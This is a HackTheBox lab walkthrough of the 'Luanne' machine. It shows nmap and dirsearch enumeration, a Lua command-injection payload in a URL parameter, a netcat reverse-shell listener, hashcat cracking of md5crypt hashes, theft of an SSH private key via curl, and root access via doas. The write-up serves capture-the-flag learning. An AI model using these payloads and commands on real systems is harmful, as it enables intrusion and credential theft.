Luanne HackTheBox WalkThrough
This is Luanne HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted to
Luanne HTB machine. Before starting let us know something about this machine. It is a
NetBSD box (which I came to know after I got into the box) with IP address
10.10.10.218 and difficulty
easy assigned by its maker. First of all, connect your PC with
HackTheBox VPN and make sure your connectivity with
Luanne machine by pinging its IP 10.10.10.218. If all goes correct then start hacking.
As usual, I started by scanning the machine. Used
Nmap [a port scanner] for this task and this time I have used an additional nmap switch
-O for finding the
Operating System as we are not aware of its OS prior. The result is below-
$ sudo nmap -sC -sV -O -oN launne.nmap 10.10.10.218
Nmap found port
9001 as open. But it didn’t find the OS and even it didn’t guess its name. Anyway, we will find its
version once we will be inside the box. For now let us enumerate on port 22, 80 and 9001.
OpenSSH 8.0 is running on port 22 and its banner also revealed the Operating System name which is
NetBSD. So here we came to know that OS of Luanne machine is NetBSD. SSH will be helpful once we get some credentials in further enumeration.
Let us dig deeper into different
services of remaining ports.
Nginx 1.19 web server is running on port
Medusa 1.12 web server is running over port
9001. Since web servers are running over ports 80 and 9001 so we should have some websites running over URLs http://10.10.10.218 & http://10.10.10.218:9001. Ongoing to these URLs found
login page on both of them like we have in tomcat web server. If you analyze nmap report deeply you will find that nmap script
http-robots.txt revealed a folder
weather at port
80 which can be accessed at URL http://10.10.10.218/weather/.
When I visited this URL it gave me
404 - Not Found error. Then I
brute forced for files and folders using
$dirsearch (a directory and file bruteforcer written in python) and wordlist
directory-list-1.0.txt (this wordlist can be found at directory /usr/share/wordlists/dirbuster/ in Kali & Parrot)
$ sudo dirsearch -u http://10.10.10.218/weather/ -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -e all -t 40 | tee big.out
Directory bruteforcing revealed a file
forecast. After accessing this file at URL http://10.10.10.218/weather/forecast got some message inside
JSON format revealing a parameter city with its value list viz.
city=list. When I accessed the URL got information about different cities.
fuzzing got error revealing that this website is using
Lua programming language. Check this URL for error http://10.10.10.218/weather/forecast?city=London‘.
Since it is using Lua language so I
fuzzed the URL for some
Lua strings and found that if we append
')os.execute("whoami") at the end of the URL http://10.10.10.218/weather/forecast?city=London it executes OS command on Luanne machine. I think this is the reason this machine is named
Luanne because here we are able to execute code via
Lua statement and Luanne also contains
Lua word. Let us confirm
OS command execution by checking
/etc/passwd file of Luanne machine.
Confirming OS Command Execution
Open following URL in browser to confirm code execution on Luanne machine.
We have successfully confirmed
remote code execution on Luanne machine. Let us get
user shell on our local machine using one liner shellcode. I have used
$nc one liner. You can found others at Pentestmonkey.
Getting User Shell
To get reverse shell first of all start
netcat listener on your Kali machine and execute the following URL in the
browser. You will get shell.
$ rlwrap nc -nvlp 1234
$ whoami && id
We have got user shell as user
_httpd. The home folder of this user i.e., current folder contains a hidden file
.htpasswd. After listing the contents of this file found a
password hash of user
$ ls -la
$ cat .htpasswd
Let us identify the type of this hash so that we can crack it using
hashcat (an offline password cracker).
hash-identifier identified this hash as
MD5 (Unix). Let us crack it using wordlist
rockyou.txt file can be found inside the directory
/usr/share/wordlists/ of Kali and Parrot OS.
Cracking Hash 1 using Hashcat
$ hashcat -m 500 -a 3 '$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0' /usr/share/wordlists/rockyou.txt
$ hashcat -m 500 -a 3 '$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0' /usr/share/wordlists/rockyou.txt --show
Hashcat has successfully cracked the hash and the cracked password is
iamthebest. So we have the credential
iamthebest. When I tried to
SSH using this credential it failed. After some enumeration found that port
3001 are listening locally.
When tried to access service on port
3001 via the URL http://127.0.0.1:3001 got
401 unauthorized error. So used the credential
iamthebest to access the service and found that we could easily logged in, and this time didn’t get any access denied permission.
$ curl http://127.0.0.1:3001
$ curl -u 'webapi_user':'iamthebest' http://127.0.0.1:3001
After some further enumeration got
id_rsa key of user
r.michaels inside its home folder using
$curl command. This is somewhat different because normally
id_rsa file is present inside the
.ssh folder of user’s home directory and can be accessed by that user & root user only. But, here it can be accessed from a
webserver running locally. So this file must be present inside some type of
public_html folder. Don’t know exactly what is the folder name in which it is present until I pawned the box.
$ curl -u 'webapi_user':'iamthebest' http://127.0.0.1:3001/~r.michaels/id_rsa
We have got
SSH private key. Let us SSH into Luanne machine using this key after changing its permission.
Getting User Shell using SSH
$ vi id_rsa
$ chmod 400 id_rsa
$ ssh -i id_rsa [email protected]
$ whoami && id
We are now logged in as user
r.michaels. Let us capture user flag.
Capture User Flag
$ cat user.txt
To escalate privilege to root we have to first find a
privilege escalation vector using which we can perform privilege escalation. For this I ran
linpeas.sh (a post exploitation enumeration script) but linpeas didn’t find any valid PrivEsc vector. So I started to do
manual enumeration on the box. After spending some times on the box found an
devel_backup-2020-09-16.tar.gz.enc inside the directory
/home/r.michaels/backups/. Didn’t know how to extract this file. If it would be
.g2z we would use
$tar tool to extract but it is
.enc extension file. After some googling found tool
$netpgp that can decrypt this file. Check this for more info.
Finding PrivEsc Vector
$ ls -la /home/r.michaels/backups/
To extract this file I simply copied this file into
/tmp/ folder and extracted the file using the following command. When it asks for password enter the password
$ cd /tmp/
$ netpgp --decrypt /home/r.michaels/backups/devel_backup-2020-09-16.tar.gz.enc --output=devel_backup-2020-09-16.tar.gz
$ tar -xf devel_backup-2020-09-16.tar.gz
$ cat devel-2020-09-16/www/.htpasswd
After extracting this file found another hash of user
$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu. . It is again
md5 (Unix) hash you can see the result of
After cracking this hash using hashcat I found the password
littlebear. Then I tried to change the user to root using
$doas command of NetBSD and I could easily login as
root. So here our PrivEsc vector is
Privilege Escalation using Credential Dumping.
Cracking Hash 2 using Hashcat
$ hashcat -m 500 -a 3 '$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.' /usr/share/wordlists/rockyou.txt
$ hashcat -m 500 -a 3 '$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.' /usr/share/wordlists/rockyou.txt --show
Let us change the user to
root user using
$doas command in NetBSD is same as
$sudo command in Linux OS. It executes command as other user. For more info check this link from FreeBSD.org.
$ doas -u root /bin/sh
# whoami && id
Capture Root Flag
Let us capture root flag.
# cat /root/root.txt
This was how I rooted to Luanne HackTheBox machine. Learnt a lot after rooting this box. Hope you have also learnt some new things from this box walkthrough. Thanks for reading this writeup. For any query and suggestion feel free to write us at [email protected].